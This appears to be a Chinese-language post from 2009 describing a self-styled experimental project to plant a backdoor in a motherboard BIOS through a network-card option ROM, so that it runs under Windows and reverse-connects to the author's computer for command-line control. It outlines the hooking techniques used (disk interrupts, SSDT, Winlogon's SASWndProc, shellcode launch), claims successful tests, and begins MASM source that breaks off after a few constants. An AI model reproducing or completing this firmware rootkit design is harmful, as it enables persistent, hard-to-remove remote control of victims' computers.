后门.doc

BIOS 中隐藏 *** BIOS 中隐藏 ***创建时间: 2009-03-19 文章属性:原创文章提交: cheng5103 () [ 项目简述] 该项目仅为实验性项目, 目的是学****国外技术。该项目主要目的是想隐藏一个 ***在主板的 BIOS 内, 并让其随着计算机系统及操作系统成功的运行起来。运行后能反向 连接到指定的计算机接受 CMD 控制。[ 关于作者] 姓名: 成松林 QQ:179641795 Email:cheng_5103@ 本人对计算机的诸多技术都很有兴趣, 常喜欢学****国外的开源项目, 很佩服国外的计算机技术及知识。本人学历:中专,专业:计算机,年龄: 25 ,工作:中专学业完成后留校工作。废话:本人家景很穷,所以大学都未上成就工作, 希望有志人士能教小弟赚钱。我文才很差, 故文章中有语法及表达问题请大家多多谅解。[ 项目涉及的相关知识及技术标题] 1 、实验环境配置问题。 2 、刷新 BIOS 技术问题。 3 、代码植入 BIOS 问题。 4 、源代码的相关问题: A 、如何编写 BIOS 模块如: PCI 、 ISA 。 B 、实模式关于 HOOK 磁盘中断的问题。 C 、磁盘中断中选择再次 HOOK 的问题。 D、 NT 保护模式下设置物理地址映射。 E、 NT 保护模式下线性地址寻址问题。 F、 HOOK KeAddSystemServiceTable 。 G、 HOOK NtUserRegisterClassExWOW 。 H、 HOOK Winlogon SASWndProc 过程。 I、在 SASWndProc 收到 WM_CREATE 消息建立线程运行 Shell Code 。 5 、源代码的其他技术: A、 IVThook InLineHook SSDT Hook B、 SEH PE PEB TIB C、 Hash SharedUserData CheckSum 6、...... 文章内容会在朋友的网站(51cto) 上发布, 文章还未整理好, 相关的工具及相关的源代码会在以后整理发布. 以下源代码采用编辑工具 MASMPlus, 直接拷贝到这里可能有格式上的问题, 做了简单的调整! 调试了几台我这儿的计算机, 以网卡 8139PCI 模块加入 BIOS 刷入芯片, 在调试计算机上安装 win2k/xp/200 3 及操作系统运行后, 以下源代码都能正常的反向连接到我指定的计算机上. .586p ; 编译工具:ML /AT *.asm ML(masm) 版本 ,BIOS 中隐藏 ***. .Model Tiny; 作者: 成松林,QQ:179641795,Emil:cheng_******@. 实现源代码. ;********************************************************** *********************************************************** ********************ROM_IMAGE_SIZE equ 4; 整个模块大小单位 KB, 固定大小 4KB. CSL_KERNEL_DEST equ 0FFDF0800h ;SharedUserDat a数据结构线性地址. CSL_USER_BACKDOOR